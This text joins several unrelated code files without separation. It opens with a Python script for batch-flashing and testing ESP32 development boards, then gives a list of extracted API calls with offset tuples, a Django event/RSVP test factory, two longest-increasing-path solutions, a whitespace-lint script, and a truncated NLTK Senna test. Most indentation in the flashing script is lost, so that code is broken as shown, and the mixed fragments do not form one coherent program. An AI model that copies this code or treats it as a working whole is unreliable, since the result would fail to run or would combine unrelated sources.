return [x[0].encode('ascii', 'ignore') for x in macs_db.execute("select mac from macs where status = 0 order by rowid asc limit ?", (number,)).fetchall()]
def set_mac_status(mac, wmac, status):
macs_db.execute("update macs set status = ?, last_touch = strftime('%s','now'), wmac = ? where mac = ?", (status, wmac, mac))
macs_db.commit()
def print_exception(e):
    print('Exception: {}, on line {}'.format(e, sys.exc_info()[-1].tb_lineno))
def erase_flash(port, command):
global working_threads
process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
num_erases = 0
# poll the process for new output until finished
while True:
nextline = process.stdout.readline()
if nextline == '' and process.poll() != None:
break
if 'Chip erase completed successfully' in nextline:
sys.stdout.write('Board erased OK on port %s\n' % port)
num_erases += 1
sys.stdout.flush()
# hack to give feedback to the main thread
if process.returncode != 0 or num_erases != 1:
working_threads[port] = None
def read_wlan_mac(port, command):
global working_threads
global wmacs
process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
mac_read = False
# poll the process for new output until finished
while True:
nextline = process.stdout.readline()
if nextline == '' and process.poll() != None:
break
if 'MAC: ' in nextline:
wmacs[port] = nextline[5:-1].replace(":", "-").upper()
sys.stdout.write('MAC address %s read OK on port %s\n' % (nextline[5:-1], port))
mac_read = True
sys.stdout.flush()
# hack to give feedback to the main thread
if process.returncode != 0 or not mac_read:
working_threads[port] = None
def set_vdd_sdio_voltage(port, command):
global working_threads
process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
# poll the process for new output until finished
while True:
nextline = process.stdout.readline()
if nextline == '' and process.poll() != None:
break
if 'VDD_SDIO setting complete' in nextline:
sys.stdout.write('Board VDD_SDIO Voltage configured OK on port %s\n' % port)
sys.stdout.flush()
# hack to give feedback to the main thread
if process.returncode != 0:
working_threads[port] = None
def flash_firmware(port, command):
global working_threads
process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
num_hashes = 0
# poll the process for new output until finished
while True:
nextline = process.stdout.readline()
if nextline == '' and process.poll() != None:
break
if 'at 0x00001000' in nextline:
sys.stdout.write('Bootloader programmed OK on port %s\n' % port)
elif 'at 0x00008000' in nextline:
sys.stdout.write('Partition table programmed OK on port %s\n' % port)
elif 'at 0x00010000' in nextline:
sys.stdout.write('Application programmed OK on port %s\n' % port)
elif 'Hash of data verified' in nextline:
num_hashes += 1
sys.stdout.flush()
# hack to give feedback to the main thread
if process.returncode != 0 or num_hashes != 3:
working_threads[port] = None
def run_initial_test(port, board):
global working_threads
if board == 'LoPy':
import run_initial_lopy_test as run_test
elif board == 'LoPy4':
import run_initial_lopy4_test as run_test
elif board == 'SiPy':
import run_initial_sipy_test as run_test
else:
import run_initial_wipy_test as run_test
try:
if not run_test.test_board(port):
# same trick to give feedback to the main thread
working_threads[port] = None
except Exception:
working_threads[port] = None
def flash_lpwan_mac(port, mac):
import flash_lpwan_mac
global working_threads
try:
if not flash_lpwan_mac.program_board(port, mac):
# same trick to give feedback to the main thread
working_threads[port] = None
except Exception:
working_threads[port] = None
def run_final_test(port, board, mac):
if board == 'LoPy':
import run_final_lopy_test as run_test
elif board == 'LoPy4':
import run_final_lopy4_test as run_test
else:
import run_final_sipy_test as run_test
try:
if not run_test.test_board(port, mac, fw_version.number):
# same trick to give feedback to the main thread
working_threads[port] = None
except Exception:
working_threads[port] = None
def run_qa_test(port, board):
global working_threads
if board == 'LoPy':
import run_qa_lopy_test as run_test
elif board == 'LoPy4':
import run_qa_lopy4_test as run_test
elif board == 'SiPy':
import run_qa_sipy_test as run_test
else:
import run_qa_wipy_test as run_test
try:
if not run_test.test_board(port, fw_version.number):
# same trick to give feedback to the main thread
working_threads[port] = None
except Exception:
working_threads[port] = None
def main():
cmd_parser = argparse.ArgumentParser(description='Flash the ESP32 and optionally run a small test on it.')
cmd_parser.add_argument('--esptool', default=None, help='the path to the esptool')
cmd_parser.add_argument('--espefuse', default=None, help='the path to the espefuse')
cmd_parser.add_argument('--boot', default=None, help='the path to the bootloader binary')
cmd_parser.add_argument('--table', default=None, help='the path to the partitions table')
cmd_parser.add_argument('--app', default=None, help='the path to the application binary')
cmd_parser.add_argument('--macs', default="macs.db", help='the path to the MAC addresses database')
cmd_parser.add_argument('--ports', default=['/dev/ttyUSB0'], nargs='+', help="the serial ports of the ESP32's to program")
cmd_parser.add_argument('--erase', default=None, help='set to True to erase the boards first')
    cmd_parser.add_argument('--qa', action='store_true', help='just do some quality assurance test')
cmd_parser.add_argument('--board', default='LoPy', help='identifies the board to be flashed and tested')
cmd_parser.add_argument('--revision', default='1', help='identifies the hardware revision')
cmd_args = cmd_parser.parse_args()
global working_threads
global wmacs
output = ""
ret = 0
global_ret = 0
if cmd_args.qa:
raw_input("Please reset all the boards, wait until the LED starts blinking and then press enter...")
time.sleep(2.5) # wait for the board to reset
try:
for port in cmd_args.ports:
working_threads[port] = threading.Thread(target=run_qa_test, args=(port, cmd_args.board))
working_threads[port].start()
for port in cmd_args.ports:
if working_threads[port]:
working_threads[port].join()
for port in cmd_args.ports:
if working_threads[port] == None:
print("Failed QA test on board connected to %s" % port)
ret = 1
except Exception as e:
ret = 1
print_exception(e)
if ret == 0:
print("=============================================================")
print("QA test succeeded on all boards:-)")
print("=============================================================")
else:
print("=============================================================")
print("ERROR: Some boards failed the QA test!")
print("=============================================================")
global_ret = 1
else:
print("Reading the WLAN MAC address...")
try:
for port in cmd_args.ports:
cmd = ['python', 'esptool.py', '--port', port, 'read_mac']
working_threads[port] = threading.Thread(target=read_wlan_mac, args=(port, cmd))
working_threads[port].start()
for port in cmd_args.ports:
if working_threads[port]:
working_threads[port].join()
_ports = list(cmd_args.ports)
for port in _ports:
if working_threads[port] == None:
print("Error reading the WLAN MAC on the board on port %s" % port)
cmd_args.ports.remove(port)
ret = 1
except Exception as e:
ret = 1
print_exception(e)
if ret == 0:
print("=============================================================")
print("WLAN MAC address reading succeeded :-)")
print("=============================================================")
else:
print("=============================================================")
print("ERROR: WLAN MAC address reading failed in some boards!")
print("=============================================================")
global_ret = 1
raw_input("Please reset all the boards and press enter to continue with the flashing process...")
if int(cmd_args.revision) > 1:
# program the efuse bits to set the VDD_SDIO voltage to 1.8V
try:
print('Configuring the VDD_SDIO voltage...')
for port in cmd_args.ports:
cmd = ['python', cmd_args.espefuse, '--port', port, '--do-not-confirm', 'set_flash_voltage', '1.8V']
working_threads[port] = threading.Thread(target=set_vdd_sdio_voltage, args=(port, cmd))
working_threads[port].start()
for port in cmd_args.ports:
if working_threads[port]:
working_threads[port].join()
_ports = list(cmd_args.ports)
for port in _ports:
if working_threads[port] == None:
print("Error setting the VDD_SDIO voltage on the board on port %s" % port)
cmd_args.ports.remove(port)
ret = 1
except Exception as e:
ret = 1
print_exception(e)
if ret == 0:
print("=============================================================")
print("VDD_SDIO voltage setting succeeded :-)")
print("=============================================================")
else:
print("=============================================================")
print("ERROR: VDD_SDIO voltage setting failed in some boards!")
print("=============================================================")
global_ret = 1
raw_input("Please reset all the boards and press enter to continue with the flashing process...")
time.sleep(1.0) # wait for the board to reset
working_threads = {}
if cmd_args.erase:
try:
print('Erasing flash memory... (will take a few seconds)')
for port in cmd_args.ports:
cmd = ['python', cmd_args.esptool, '--chip', 'esp32', '--port', port, '--baud', '921600',
'erase_flash']
working_threads[port] = threading.Thread(target=erase_flash, args=(port, cmd))
working_threads[port].start()
for port in cmd_args.ports:
if working_threads[port]:
working_threads[port].join()
_ports = list(cmd_args.ports)
for port in _ports:
if working_threads[port] == None:
print("Error erasing board on port %s" % port)
cmd_args.ports.remove(port)
ret = 1
except Exception as e:
ret = 1
print_exception(e)
if ret == 0:
print("=============================================================")
print("Batch erasing succeeded :-)")
print("=============================================================")
else:
print("=============================================================")
print("ERROR: Batch erasing failed in some boards!")
print("=============================================================")
global_ret = 1
raw_input("Please reset all the boards and press enter to continue with the flashing process...")
time.sleep(1.0) # wait for the board to reset
working_threads = {}
try:
if cmd_args.board == 'LoPy' or cmd_args.board == 'SiPy' or cmd_args.board == 'LoPy4':
open_macs_db(cmd_args.macs)
macs_list = fetch_MACs(len(cmd_args.ports))
if len(macs_list) < len(cmd_args.ports):
print("No enough remaining MAC addresses to use")
sys.exit(1)
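                # reserve one LPWAN MAC address from the pool for each board being flashed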
mac_per_port = {}
i = 0
for port in cmd_args.ports:
mac_per_port[port] = macs_list[i]
i += 1
for port in cmd_args.ports:
cmd = ['python', cmd_args.esptool, '--chip', 'esp32', '--port', port, '--baud', '921600',
'write_flash', '-z', '--flash_mode', 'dio', '--flash_freq', '40m', '--flash_size', 'detect', '0x1000', cmd_args.boot,
'0x8000', cmd_args.table, '0x10000', cmd_args.app]
working_threads[port] = threading.Thread(target=flash_firmware, args=(port, cmd))
working_threads[port].start()
for port in cmd_args.ports:
if working_threads[port]:
working_threads[port].join()
_ports = list(cmd_args.ports)
for port in _ports:
if working_threads[port] == None:
print("Error programming board on port %s" % port)
cmd_args.ports.remove(port)
ret = 1
else:
print("Board on port %s programmed OK" % port)
except Exception as e:
ret = 1
print_exception(e)
if ret == 0:
print("=============================================================")
print("Batch programming succeeded :-)")
print("=============================================================")
else:
print("=============================================================")
print("ERROR: Batch firmware programming failed on some boards!")
print("=============================================================")
global_ret = 1
raw_input("Please place all boards into run mode, RESET them and then \n press enter to continue with the testing process...")
time.sleep(5.0) # wait for the board to reset
working_threads = {}
try:
for port in cmd_args.ports:
working_threads[port] = threading.Thread(target=run_initial_test, args=(port, cmd_args.board))
working_threads[port].start()
for port in cmd_args.ports:
if working_threads[port]:
working_threads[port].join()
_ports = list(cmd_args.ports)
for port in _ports:
if working_threads[port] == None:
print("Error testing board on port %s" % port)
cmd_args.ports.remove(port)
ret = 1
elif cmd_args.board == 'WiPy':
print("Batch test OK on port %s, firmware version %s" % (port, fw_version.number))
with open('%s_Flasher_Results.csv' % (cmd_args.board), 'ab') as csv_file:
csv_writer = csv.writer(csv_file, delimiter=',')
csv_writer.writerow(['%s' % (cmd_args.board), '%s' % (fw_version.number), ' ', 'OK'])
except Exception as e:
ret = 1
print_exception(e)
if ret == 0:
print("=============================================================")
print("Batch testing succeeded :-)")
print("=============================================================")
else:
print("=============================================================")
print("ERROR: Batch testing failed in some boards!")
print("=============================================================")
global_ret = 1
# only do the MAC programming and MAC verificacion for the LoPy, SiPy and LoPy4
if cmd_args.board == 'LoPy' or cmd_args.board == 'SiPy' or cmd_args.board == 'LoPy4':
print("Waiting before programming the LPWAN MAC address...")
time.sleep(3.5) # wait for the board to reset
working_threads = {}
try:
for port in cmd_args.ports:
set_mac_status(mac_per_port[port], "", DB_MAC_LOCK) # mark them as locked, so if the script fails and doesn't get to save, they wont be accidentally reused
working_threads[port] = threading.Thread(target=flash_lpwan_mac, args=(port, mac_per_port[port]))
working_threads[port].start()
for port in cmd_args.ports:
if working_threads[port]:
working_threads[port].join()
_ports = list(cmd_args.ports)
for port in _ports:
if working_threads[port] == None:
print("Error programing MAC address on port %s" % port)
cmd_args.ports.remove(port)
ret = 1
set_mac_status(mac_per_port[port], wmacs[port], DB_MAC_ERROR)
except Exception as e:
ret = 1
print_exception(e)
if ret == 0:
print("=============================================================")
print("Batch MAC programming succeeded :-)")
print("=============================================================")
else:
print("=============================================================")
print("ERROR: Batch MAC programming failed in some boards!")
print("=============================================================")
global_ret = 1
print("Waiting for the board(s) to reboot...")
time.sleep(4.5) # wait for the board to reset
working_threads = {}
try:
for port in cmd_args.ports:
working_threads[port] = threading.Thread(target=run_final_test, args=(port, cmd_args.board, mac_per_port[port]))
working_threads[port].start()
for port in cmd_args.ports:
if working_threads[port]:
working_threads[port].join()
for port in cmd_args.ports:
if working_threads[port] == None:
ret = 1
set_mac_status(mac_per_port[port], wmacs[port], DB_MAC_ERROR)
print("Error performing MAC address test on port %s" % port)
else:
set_mac_status(mac_per_port[port], wmacs[port], DB_MAC_OK)
print("Final test OK on port %s, firmware version %s, MAC address %s" % (port, fw_version.number, mac_per_port[port]))
with open('%s_Flasher_Results.csv' % (cmd_args.board), 'ab') as csv_file:
csv_writer = csv.writer(csv_file, delimiter=',')
csv_writer.writerow(['%s' % (cmd_args.board), '%s' % (fw_version.number), '%s' % (mac_per_port[port]), 'OK'])
except Exception as e:
ret = 1
print_exception(e)
if ret == 0:
print("=============================================================")
print("Final test succeeded on all boards :-)")
print("=============================================================")
else:
print("=============================================================")
print("ERROR: Some boards failed the final test!")
print("=============================================================")
global_ret = 1
macs_db.close()
sys.exit(global_ret)
if __name__ == "__main__":
main()
| [
"os.path.exists",
"sqlite3.connect",
"argparse.ArgumentParser",
"flash_lpwan_mac.program_board",
"subprocess.Popen",
"csv.writer",
"time.sleep",
"run_qa_wipy_test.test_board",
"sys.exc_info",
"sys.exit",
"threading.Thread",
"sys.stdout.flush",
"sys.stdout.write"
]
| [((1169, 1197), 'sqlite3.connect', 'sqlite3.connect', (['db_filename'], {}), '(db_filename)\n', (1184, 1197), False, 'import sqlite3\n'), ((1752, 1827), 'subprocess.Popen', 'subprocess.Popen', (['command'], {'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.STDOUT'}), '(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n', (1768, 1827), False, 'import subprocess\n'), ((2446, 2521), 'subprocess.Popen', 'subprocess.Popen', (['command'], {'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.STDOUT'}), '(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n', (2462, 2521), False, 'import subprocess\n'), ((3195, 3270), 'subprocess.Popen', 'subprocess.Popen', (['command'], {'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.STDOUT'}), '(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n', (3211, 3270), False, 'import subprocess\n'), ((3820, 3895), 'subprocess.Popen', 'subprocess.Popen', (['command'], {'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.STDOUT'}), '(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n', (3836, 3895), False, 'import subprocess\n'), ((6652, 6750), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Flash the ESP32 and optionally run a small test on it."""'}), "(description=\n 'Flash the ESP32 and optionally run a small test on it.')\n", (6675, 6750), False, 'import argparse\n'), ((22388, 22408), 'sys.exit', 'sys.exit', (['global_ret'], {}), '(global_ret)\n', (22396, 22408), False, 'import sys\n'), ((1056, 1083), 'os.path.exists', 'os.path.exists', (['db_filename'], {}), '(db_filename)\n', (1070, 1083), False, 'import os\n'), ((1143, 1154), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (1151, 1154), False, 'import sys\n'), ((2198, 2216), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (2214, 2216), False, 'import sys\n'), ((2959, 2977), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (2975, 2977), False, 'import sys\n'), ((3607, 3625), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (3623, 3625), False, 'import sys\n'), ((4549, 4567), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (4565, 4567), False, 'import sys\n'), ((8108, 8123), 'time.sleep', 'time.sleep', (['(2.5)'], {}), '(2.5)\n', (8118, 8123), False, 'import time\n'), ((16644, 16659), 'time.sleep', 'time.sleep', (['(5.0)'], {}), '(5.0)\n', (16654, 16659), False, 'import time\n'), ((2106, 2161), 'sys.stdout.write', 'sys.stdout.write', (["('Board erased OK on port %s\\n' % port)"], {}), "('Board erased OK on port %s\\n' % port)\n", (2122, 2161), False, 'import sys\n'), ((2842, 2927), 'sys.stdout.write', 'sys.stdout.write', (["('MAC address %s read OK on port %s\\n' % (nextline[5:-1], port))"], {}), "('MAC address %s read OK on port %s\\n' % (nextline[5:-1], port)\n )\n", (2858, 2927), False, 'import sys\n'), ((3522, 3598), 'sys.stdout.write', 'sys.stdout.write', (["('Board VDD_SDIO Voltage configured OK on port %s\\n' % port)"], {}), "('Board VDD_SDIO Voltage configured OK on port %s\\n' % port)\n", (3538, 3598), False, 'import sys\n'), ((4154, 4218), 'sys.stdout.write', 'sys.stdout.write', (["('Bootloader programmed OK on port %s\\n' % port)"], {}), "('Bootloader programmed OK on port %s\\n' % port)\n", (4170, 4218), False, 'import sys\n'), ((5077, 5102), 'run_qa_wipy_test.test_board', 'run_test.test_board', (['port'], {}), '(port)\n', (5096, 5102), True, 'import run_qa_wipy_test as run_test\n'), ((5377, 5417), 'flash_lpwan_mac.program_board', 'flash_lpwan_mac.program_board', (['port', 'mac'], {}), '(port, 
mac)\n', (5406, 5417), False, 'import flash_lpwan_mac\n'), ((5851, 5900), 'run_qa_wipy_test.test_board', 'run_test.test_board', (['port', 'mac', 'fw_version.number'], {}), '(port, mac, fw_version.number)\n', (5870, 5900), True, 'import run_qa_wipy_test as run_test\n'), ((6415, 6459), 'run_qa_wipy_test.test_board', 'run_test.test_board', (['port', 'fw_version.number'], {}), '(port, fw_version.number)\n', (6434, 6459), True, 'import run_qa_wipy_test as run_test\n'), ((12515, 12530), 'time.sleep', 'time.sleep', (['(1.0)'], {}), '(1.0)\n', (12525, 12530), False, 'import time\n'), ((14259, 14274), 'time.sleep', 'time.sleep', (['(1.0)'], {}), '(1.0)\n', (14269, 14274), False, 'import time\n'), ((18620, 18635), 'time.sleep', 'time.sleep', (['(3.5)'], {}), '(3.5)\n', (18630, 18635), False, 'import time\n'), ((20367, 20382), 'time.sleep', 'time.sleep', (['(4.5)'], {}), '(4.5)\n', (20377, 20382), False, 'import time\n'), ((4273, 4342), 'sys.stdout.write', 'sys.stdout.write', (["('Partition table programmed OK on port %s\\n' % port)"], {}), "('Partition table programmed OK on port %s\\n' % port)\n", (4289, 4342), False, 'import sys\n'), ((8249, 8314), 'threading.Thread', 'threading.Thread', ([], {'target': 'run_qa_test', 'args': '(port, cmd_args.board)'}), '(target=run_qa_test, args=(port, cmd_args.board))\n', (8265, 8314), False, 'import threading\n'), ((9510, 9566), 'threading.Thread', 'threading.Thread', ([], {'target': 'read_wlan_mac', 'args': '(port, cmd)'}), '(target=read_wlan_mac, args=(port, cmd))\n', (9526, 9566), False, 'import threading\n'), ((15297, 15354), 'threading.Thread', 'threading.Thread', ([], {'target': 'flash_firmware', 'args': '(port, cmd)'}), '(target=flash_firmware, args=(port, cmd))\n', (15313, 15354), False, 'import threading\n'), ((16816, 16886), 'threading.Thread', 'threading.Thread', ([], {'target': 'run_initial_test', 'args': '(port, cmd_args.board)'}), '(target=run_initial_test, args=(port, cmd_args.board))\n', (16832, 16886), False, 'import threading\n'), ((1647, 1661), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (1659, 1661), False, 'import sys\n'), ((4397, 4462), 'sys.stdout.write', 'sys.stdout.write', (["('Application programmed OK on port %s\\n' % port)"], {}), "('Application programmed OK on port %s\\n' % port)\n", (4413, 4462), False, 'import sys\n'), ((11153, 11216), 'threading.Thread', 'threading.Thread', ([], {'target': 'set_vdd_sdio_voltage', 'args': '(port, cmd)'}), '(target=set_vdd_sdio_voltage, args=(port, cmd))\n', (11169, 11216), False, 'import threading\n'), ((12956, 13010), 'threading.Thread', 'threading.Thread', ([], {'target': 'erase_flash', 'args': '(port, cmd)'}), '(target=erase_flash, args=(port, cmd))\n', (12972, 13010), False, 'import threading\n'), ((14703, 14714), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (14711, 14714), False, 'import sys\n'), ((18984, 19057), 'threading.Thread', 'threading.Thread', ([], {'target': 'flash_lpwan_mac', 'args': '(port, mac_per_port[port])'}), '(target=flash_lpwan_mac, args=(port, mac_per_port[port]))\n', (19000, 19057), False, 'import threading\n'), ((20555, 20647), 'threading.Thread', 'threading.Thread', ([], {'target': 'run_final_test', 'args': '(port, cmd_args.board, mac_per_port[port])'}), '(target=run_final_test, args=(port, cmd_args.board,\n mac_per_port[port]))\n', (20571, 20647), False, 'import threading\n'), ((17613, 17648), 'csv.writer', 'csv.writer', (['csv_file'], {'delimiter': '""","""'}), "(csv_file, delimiter=',')\n", (17623, 17648), False, 'import csv\n'), ((21531, 21566), 
'csv.writer', 'csv.writer', (['csv_file'], {'delimiter': '""","""'}), "(csv_file, delimiter=',')\n", (21541, 21566), False, 'import csv\n')] |
import datetime
from django.utils import timezone
from django.contrib.auth.models import User
from hknweb.events.models import Event, EventType, Rsvp
class ModelFactory:
@staticmethod
def create_user(**kwargs):
default_kwargs = {
"username": "default username",
}
kwargs = {**default_kwargs, **kwargs}
return User.objects.create(**kwargs)
@staticmethod
def create_event_type(**kwargs):
default_kwargs = {
"type": "default event type",
}
kwargs = {**default_kwargs, **kwargs}
return EventType.objects.create(**kwargs)
@staticmethod
def create_event(name, event_type, created_by, **kwargs):
required_kwargs = {
"name": name,
"event_type": event_type,
"created_by": created_by,
}
default_kwargs = {
"start_time": timezone.now(),
"end_time": timezone.now() + datetime.timedelta(hours=2),
"location": "default location",
"description": "default description",
}
kwargs = {**required_kwargs, **default_kwargs, **kwargs}
return Event.objects.create(**kwargs)
@staticmethod
def create_rsvp(user, event, **kwargs):
required_kwargs = {
"user": user,
"event": event,
}
kwargs = {**required_kwargs, **kwargs}
return Rsvp.objects.create(**kwargs)
@staticmethod
def create_event_with_rsvps():
event_create_user = ModelFactory.create_user(username="event create user")
num_rsvps = 3
rsvp_users = [
ModelFactory.create_user(username="rsvp_user_{}".format(str(i)))
for i in range(1, 1 + num_rsvps)
]
event_type = ModelFactory.create_event_type()
event_name = "custom event name"
event = ModelFactory.create_event(
name=event_name,
event_type=event_type,
created_by=event_create_user,
rsvp_limit=num_rsvps - 1,
)
rsvps = [ModelFactory.create_rsvp(rsvp_user, event) for rsvp_user in rsvp_users]
return (
event_create_user,
rsvp_users,
event_type,
event_name,
event,
rsvps,
)
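# Minimal usage sketch: exercising the factory from a Django TestCase. The test
# class below is illustrative only and assumes a configured test database.
from django.test import TestCase
class EventFactoryUsageExample(TestCase):
    def test_create_event_with_rsvps(self):
        _, rsvp_users, _, name, event, rsvps = ModelFactory.create_event_with_rsvps()
        self.assertEqual(event.name, name)
        self.assertEqual(len(rsvps), len(rsvp_users))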
| [
"hknweb.events.models.Rsvp.objects.create",
"hknweb.events.models.Event.objects.create",
"datetime.timedelta",
"django.utils.timezone.now",
"django.contrib.auth.models.User.objects.create",
"hknweb.events.models.EventType.objects.create"
]
| [((365, 394), 'django.contrib.auth.models.User.objects.create', 'User.objects.create', ([], {}), '(**kwargs)\n', (384, 394), False, 'from django.contrib.auth.models import User\n'), ((591, 625), 'hknweb.events.models.EventType.objects.create', 'EventType.objects.create', ([], {}), '(**kwargs)\n', (615, 625), False, 'from hknweb.events.models import Event, EventType, Rsvp\n'), ((1170, 1200), 'hknweb.events.models.Event.objects.create', 'Event.objects.create', ([], {}), '(**kwargs)\n', (1190, 1200), False, 'from hknweb.events.models import Event, EventType, Rsvp\n'), ((1418, 1447), 'hknweb.events.models.Rsvp.objects.create', 'Rsvp.objects.create', ([], {}), '(**kwargs)\n', (1437, 1447), False, 'from hknweb.events.models import Event, EventType, Rsvp\n'), ((900, 914), 'django.utils.timezone.now', 'timezone.now', ([], {}), '()\n', (912, 914), False, 'from django.utils import timezone\n'), ((940, 954), 'django.utils.timezone.now', 'timezone.now', ([], {}), '()\n', (952, 954), False, 'from django.utils import timezone\n'), ((957, 984), 'datetime.timedelta', 'datetime.timedelta', ([], {'hours': '(2)'}), '(hours=2)\n', (975, 984), False, 'import datetime\n')] |
"""
1. Clarification
2. Possible solutions
- dfs + memoization
- Topological sort
3. Coding
4. Tests
"""
# T=O(m*n), S=O(m*n)
import collections
from functools import lru_cache
from typing import List
class Solution:
DIRS = [(-1, 0), (1, 0), (0, -1), (0, 1)]
def longestIncreasingPath(self, matrix: List[List[int]]) -> int:
if not matrix:
return 0
@lru_cache(None)
def dfs(row: int, col: int) -> int:
best = 1
for dx, dy in Solution.DIRS:
newRow, newCol = row + dx, col + dy
if 0 <= newRow < rows and 0 <= newCol < cols and matrix[newRow][newCol] > matrix[row][col]:
best = max(best, dfs(newRow, newCol) + 1)
return best
ans = 0
rows, cols = len(matrix), len(matrix[0])
for i in range(rows):
for j in range(cols):
ans = max(ans, dfs(i, j))
return ans
# T=O(m*n), S=O(m*n)
class Solution:
DIRS = [(-1, 0), (1, 0), (0, -1), (0, 1)]
def longestIncreasingPath(self, matrix: List[List[int]]) -> int:
if not matrix:
return 0
rows, cols = len(matrix), len(matrix[0])
outdegrees = [[0] * cols for _ in range(rows)]
queue = collections.deque()
for i in range(rows):
for j in range(cols):
for dx, dy in Solution.DIRS:
newRow, newCol = i + dx, j + dy
if 0 <= newRow < rows and 0 <= newCol < cols and matrix[newRow][newCol] > matrix[i][j]:
outdegrees[i][j] += 1
if outdegrees[i][j] == 0:
queue.append((i, j))
ans = 0
while queue:
ans += 1
size = len(queue)
for _ in range(size):
row, col = queue.popleft()
for dx, dy in Solution.DIRS:
newRow, newCol = row + dx, col + dy
if 0 <= newRow < rows and 0 <= newCol < cols and matrix[newRow][newCol] < matrix[row][col]:
outdegrees[newRow][newCol] -= 1
if outdegrees[newRow][newCol] == 0:
queue.append((newRow, newCol))
return ans
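# Minimal usage sketch on the classic example matrix. Note that the second
# Solution (topological sort) shadows the first, so this runs the BFS variant;
# the expected longest increasing path is 1 -> 2 -> 6 -> 9, i.e. length 4.
if __name__ == "__main__":
    grid = [[9, 9, 4], [6, 6, 8], [2, 1, 1]]
    print(Solution().longestIncreasingPath(grid))  # 4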
| [
"functools.lru_cache"
]
| [((356, 371), 'functools.lru_cache', 'lru_cache', (['None'], {}), '(None)\n', (365, 371), False, 'from functools import lru_cache\n')] |
#!/usr/bin/env python
#coding=utf-8
'''
Remove trailing whitespace and ensure one and only one empty line at the end of each file.
'''
import os, re
def scan(*dirs, **kwargs):
files = []
    extensions = kwargs.get('extensions')
    excludes = kwargs.get('excludes', [])
for top in dirs:
for root, dirnames, filenames in os.walk(top):
            # prune excluded directories in place so os.walk() skips them
            dirnames[:] = [i for i in dirnames if i not in excludes]
for f in filenames:
if f in excludes:
continue
ext = os.path.splitext(f)[1].lower()
if extensions is None or ext in extensions:
files.append(os.path.join(root, f))
return files
def fixone(src):
lines = open(src, 'r').readlines()
trimed = []
for line in lines:
        trimed.append(re.sub(r'\s+$', '', line))
while len(trimed) > 1 and not trimed[-1]:
trimed.pop()
trimed.append('')
with open(src, 'w') as f:
for line in trimed:
f.write('%s\n' % line)
def lint(root):
    print('Checking trailing whitespace in: %s' % root)
dirs = [
os.path.join(root, 'cocos'),
os.path.join(root, 'extensions'),
os.path.join(root, 'templates'),
os.path.join(root, 'tests'),
os.path.join(root, 'tools', 'simulator')
]
files = scan(*dirs, extensions=['.c', '.cpp', '.h', '.hpp', '.m', '.mm', '.java'])
for f in files:
print(f)
fixone(f)
def main():
default_root = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', '..'))
lint(default_root)
main()
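# Minimal self-check sketch for fixone(); the sample content is illustrative and
# the helper is not called automatically (main() above already lints the repo).
def demo_fixone():
    import tempfile
    with tempfile.NamedTemporaryFile('w', suffix='.cpp', delete=False) as tmp:
        tmp.write('int main() {}   \n\n\n')
        sample = tmp.name
    fixone(sample)
    print(repr(open(sample).read()))  # -> 'int main() {}\n\n'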
| [
"os.path.splitext",
"os.path.join",
"os.path.dirname",
"re.sub",
"os.walk"
]
| [((380, 392), 'os.walk', 'os.walk', (['top'], {}), '(top)\n', (387, 392), False, 'import os, re\n'), ((1065, 1092), 'os.path.join', 'os.path.join', (['root', '"""cocos"""'], {}), "(root, 'cocos')\n", (1077, 1092), False, 'import os, re\n'), ((1098, 1130), 'os.path.join', 'os.path.join', (['root', '"""extensions"""'], {}), "(root, 'extensions')\n", (1110, 1130), False, 'import os, re\n'), ((1136, 1167), 'os.path.join', 'os.path.join', (['root', '"""templates"""'], {}), "(root, 'templates')\n", (1148, 1167), False, 'import os, re\n'), ((1173, 1200), 'os.path.join', 'os.path.join', (['root', '"""tests"""'], {}), "(root, 'tests')\n", (1185, 1200), False, 'import os, re\n'), ((1206, 1246), 'os.path.join', 'os.path.join', (['root', '"""tools"""', '"""simulator"""'], {}), "(root, 'tools', 'simulator')\n", (1218, 1246), False, 'import os, re\n'), ((788, 813), 're.sub', 're.sub', (['"""\\\\s+$"""', '""""""', 'line'], {}), "('\\\\s+$', '', line)\n", (794, 813), False, 'import os, re\n'), ((1442, 1467), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (1457, 1467), False, 'import os, re\n'), ((641, 662), 'os.path.join', 'os.path.join', (['root', 'f'], {}), '(root, f)\n', (653, 662), False, 'import os, re\n'), ((535, 554), 'os.path.splitext', 'os.path.splitext', (['f'], {}), '(f)\n', (551, 554), False, 'import os, re\n')] |
# -*- coding: utf-8 -*-
"""
Unit tests for Senna
"""
from __future__ import unicode_literals
from os import environ, path, sep
import logging
import unittest
from nltk.classify import Senna
from nltk.tag import SennaTagger, SennaChunkTagger, SennaNERTagger
# Set Senna executable path for tests if it is not specified as an environment variable
if 'SENNA' in environ:
SENNA_EXECUTABLE_PATH = path.normpath(environ['SENNA']) + sep
else:
SENNA_EXECUTABLE_PATH = '/usr/share/senna-v3.0'
senna_is_installed = path.exists(SENNA_EXECUTABLE_PATH)
@unittest.skipUnless(senna_is_installed, "Requires Senna executable")
class TestSennaPipeline(unittest.TestCase):
"""Unittest for nltk.classify.senna"""
def test_senna_pipeline(self):
"""Senna pipeline interface"""
pipeline = Senna(SENNA_EXECUTABLE_PATH, ['pos', 'chk', 'ner'])
sent = 'Dusseldorf is an international business center'.split()
result = [(token['word'], token['chk'], token['ner'], token['pos']) for token in pipeline.tag(sent)]
